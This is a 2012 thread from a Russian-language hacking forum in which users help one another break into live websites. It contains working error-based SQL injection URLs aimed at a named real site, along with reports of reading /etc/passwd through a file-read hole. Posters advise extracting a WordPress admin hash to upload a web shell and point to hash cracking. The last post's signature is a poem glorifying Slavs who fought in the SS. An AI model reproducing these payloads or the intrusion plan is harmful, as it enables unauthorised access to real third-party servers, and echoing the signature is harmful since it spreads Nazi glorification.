HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.06.2012, 17:20
shadowrun
Постоянный
Регистрация: 29.08.2010
Сообщений: 842
Провел на форуме:
183267

Репутация: 84


По умолчанию

Цитата:
Сообщение от kingbeef  
blind
так не люблю
 
Ответить с цитированием

  #2  
Старый 20.06.2012, 02:06
DJ ][akep
Познающий
Регистрация: 27.01.2008
Сообщений: 57
Провел на форуме:
355954

Репутация: 32
По умолчанию

Ребят подскажите пожалуйста где находятся конфиги доступа бд в vbulletin 3.3

UPD: нашел ) Includes/config.php
 
Ответить с цитированием

  #3  
Старый 20.06.2012, 02:57
trololoman96
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020

Репутация: 55
По умолчанию

Есть инъекция с читалкой файлов, нашел там раскрытие путей, но не могу прочитать этот файл, хотя он точно существует, зато могу прочитать /etc/passwd, апачевский конфиг. В конфиге нашел

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]# DocumentRoot: The directory out of which you will serve your

# documents. By default, all requests are taken from this directory, but

# symbolic links and aliases may be used to point to other locations.

#

[/COLOR][COLOR="#0000BB"]DocumentRoot[/COLOR][COLOR="#DD0000"]"/var/www/html"

[/COLOR][COLOR="#007700"]...

[/
COLOR][COLOR="#FF8000"]# This should be changed to whatever you set DocumentRoot to.

#

[/COLOR][COLOR="#007700"]

[/
COLOR][/COLOR
Описаний виртуальных хостов я там не нашел. В раскритии путь выглядит иначе

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]home[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]public_html[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]music[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]p[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][/COLOR
Где правду искать ?
 
Ответить с цитированием

  #4  
Старый 20.06.2012, 04:38
CyberKillerz
Новичок
Регистрация: 19.06.2012
Сообщений: 23
Провел на форуме:
7695

Репутация: -5
По умолчанию

Есть инъекция даже не 1 немогу шелл залить помогите плиз

http://wow.igrosfera.net/acp/index.php?modul=static&id=3
 
Ответить с цитированием

  #5  
Старый 20.06.2012, 05:22
trololoman96
Участник форума
Регистрация: 01.12.2011
Сообщений: 120
Провел на форуме:
29020

Репутация: 55
По умолчанию

Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем

Код:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29,0x3a,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ?
 
Ответить с цитированием

  #6  
Старый 20.06.2012, 05:30
Redwood
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846

Репутация: 56
По умолчанию

Цитата:
Сообщение от CyberKillerz  
Есть инъекция даже не 1 немогу шелл залить помогите плиз
http://wow.igrosfera.net/acp/index.php?modul=static&id=3
Код:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+and+extractvalue(1,(select+concat(0x2a,(select+table_name+from+information_schema.tables+where+table_schema!='information_schema'+limit+0,1))))
 
Ответить с цитированием

  #7  
Старый 20.06.2012, 08:29
CyberKillerz
Новичок
Регистрация: 19.06.2012
Сообщений: 23
Провел на форуме:
7695

Репутация: -5
По умолчанию

Цитата:
Сообщение от trololoman96  
Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем
Код:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29%29,0x3a,floor%28rand%280%29*2%29%29having+min%280%29+or+1--+
там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ?
Хм ты намекаешь на его уязвимость ? я просто начинающий )
 
Ответить с цитированием

  #8  
Старый 20.06.2012, 09:33
smirk
Участник форума
Регистрация: 08.09.2011
Сообщений: 137
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от CyberKillerz  
Хм ты намекаешь на его уязвимость ? я просто начинающий )
он намекает, чтоб ты вытащил логин и хеш админа вордпресса и через этот блог залил шелл...
 
Ответить с цитированием

  #9  
Старый 20.06.2012, 09:40
CyberKillerz
Новичок
Регистрация: 19.06.2012
Сообщений: 23
Провел на форуме:
7695

Репутация: -5
По умолчанию

Цитата:
Сообщение от smirk  
он намекает, чтоб ты вытащил логин и хеш админа вордпресса и через этот блог залил шелл...
а ни кто не поможет с брутом а то у мну с ним постоянная проблема ))
 
Ответить с цитированием

  #10  
Старый 20.06.2012, 11:20
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

Цитата:
Сообщение от CyberKillerz  
а ни кто не поможет с брутом а то у мну с ним постоянная проблема ))
брут чего? хеша? есть раздел выше про расшифровку хеша, запости туда свой хеш и надейся ,что его расшифруют
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.